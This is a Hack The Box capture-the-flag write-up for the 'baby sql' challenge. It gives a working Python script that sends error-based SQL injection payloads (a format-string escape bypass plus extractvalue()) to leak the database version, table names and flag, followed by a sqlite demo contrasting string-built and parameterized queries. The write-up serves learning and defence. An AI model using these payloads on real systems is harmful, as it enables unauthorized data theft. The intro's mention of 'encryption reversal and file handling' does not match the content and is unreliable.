HackTheBox baby sql Challenge
Explore the basics of cybersecurity in the baby sql Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
https://app.hackthebox.com/challenges/146
Description
I heard that *real_escape_string() functions protect you from malicious user input inside SQL statements, I hope you can’t prove me wrong…
Exploitation
#!/usr/bin/env python3
import requests
import sys


def send_post_request(url, data):
    return requests.post(url, data=data)


if len(sys.argv) != 2:
    print(f"Usage: python {sys.argv[0]} <ip:port>")
    sys.exit(1)

host, port = sys.argv[1].split(':')
HOST = f'http://{host}:{port}/'

# Each payload goes in the 'pass' field; the XPath error raised by extractvalue()
# carries the selected value back in the response body.
payloads = [
    # database version
    {'pass': "%1$')||extractvalue(null,concat(0x7e, version()));#"},
    # table names in the current database
    {'pass': "%1$')||extractvalue(null,concat(0x7e,(select group_concat(table_name) from information_schema.tables WHERE table_schema=database())));#"},
    # contents of the flag table
    {'pass': "%1$')||extractvalue(null,concat(0x7e,(select * from totally_not_a_flag)));#"},
]

for payload in payloads:
    print(send_post_request(HOST, payload).text)
Summary
The baby sql Challenge on Hack The Box is a medium-level web challenge that involves exploiting improper input sanitization in SQL queries. Participants leverage SQL injection through improper use of real_escape_string(), using XPath error-based injection via extractvalue() to extract database information and retrieve the flag. The challenge highlights the risks of incomplete input validation, emphasizing the importance of proper parameterized queries to prevent SQL injection vulnerabilities.
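As an added example, not code from the writeup or from the challenge itself, the three pass payloads above are run against a query assembled by string formatting and against a parameterized one. It assumes sqlite3 standing in for MySQL and a query of the shape password = ('...') (the challenge's server-side source is not shown here); because sqlite has no extractvalue(), the injected call surfaces as a database error rather than a leaked value, which is still proof that the input reached the engine as SQL instead of as data.

```python
#!/usr/bin/env python3
import sqlite3

# The same three payloads the exploit script sends in the 'pass' field.
PAYLOADS = [
    "%1$')||extractvalue(null,concat(0x7e, version()));#",
    "%1$')||extractvalue(null,concat(0x7e,(select group_concat(table_name) from information_schema.tables WHERE table_schema=database())));#",
    "%1$')||extractvalue(null,concat(0x7e,(select * from totally_not_a_flag)));#",
]


def make_db():
    # Constructed in-memory table with a single user record (assumption: sqlite3
    # stands in for the challenge's MySQL backend).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    return db


def login_formatted(db, password):
    # Vulnerable pattern: the value is spliced into the statement text, so the
    # statement's structure is whatever the client sent.
    sql = f"SELECT username FROM users WHERE password = ('{password}')"
    return db.execute(sql).fetchone()


def login_parameterized(db, password):
    # Fixed pattern: the statement text never changes; the value is bound
    # separately and compared as a plain string, whatever characters it holds.
    sql = "SELECT username FROM users WHERE password = (?)"
    return db.execute(sql, (password,)).fetchone()


def classify(db, password):
    """Return (formatted_outcome, parameterized_outcome) for one password value."""
    try:
        formatted = "row" if login_formatted(db, password) else "no match"
    except sqlite3.Error as exc:
        # The engine rejected the statement: the input altered the query itself.
        formatted = f"error: {exc}"
    bound = "row" if login_parameterized(db, password) else "no match"
    return formatted, bound


if __name__ == "__main__":
    db = make_db()
    print(classify(db, "correct horse battery staple"))
    for p in PAYLOADS:
        print(classify(db, p))
```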